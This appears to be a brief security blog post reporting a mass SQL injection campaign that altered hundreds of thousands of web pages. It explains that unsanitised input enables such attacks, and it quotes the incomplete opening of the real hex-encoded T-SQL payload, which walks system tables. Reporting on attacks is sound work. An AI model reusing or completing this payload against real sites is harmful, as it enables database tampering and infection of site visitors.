Mass SQL Injection infects Hundreds of Thousands of Websites

f-secure blog reports, there's another round of mass SQL injections going on which has infected hundreds of thousands of websites. Performing a Google search results in over 510,000 modified pages. As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it's crucial to verify what […]

f-secure blog reports, there's another round of mass SQL injections going on which has infected hundreds of thousands of websites.

Performing a Google search results in over 510,000 modified pages.

As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it's crucial to verify what information gets stored in or requested from those databases — especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, et cetera.

Unless that data is sanitized before it gets saved you can't control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. In this case the injection code starts off like this (note, this is not the complete code):

   DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
   4C00410052004500200040005400200076006100720063006800610072
   00280032003500350029002C0040004300200076006100720063006800
   610072002800320035003500290020004400450043004C004100520045
   0020005400610062006C0065005F0043007500720073006F0072002000
   43005500520053004F005200200046004F0052002000730065006C0065
   0063007400200061002E006E0061006D0065002C0062002E006E006100
   6D0065002000660072006F006D0020007300790073006F0062006A0065
   00630074007300200061002C0073007900730063006F006C0075006D00
   6E00730020006200200077006800650072006500200061002E00690064
   003D0062002E0069006400200061006E006400200061002E0078007400
   7900700065003D00270075002700200061006E0064002000280062002E
   00780074007900700065003D003900390020006F007200200062002E00
   780074007900700065003D003300350020006…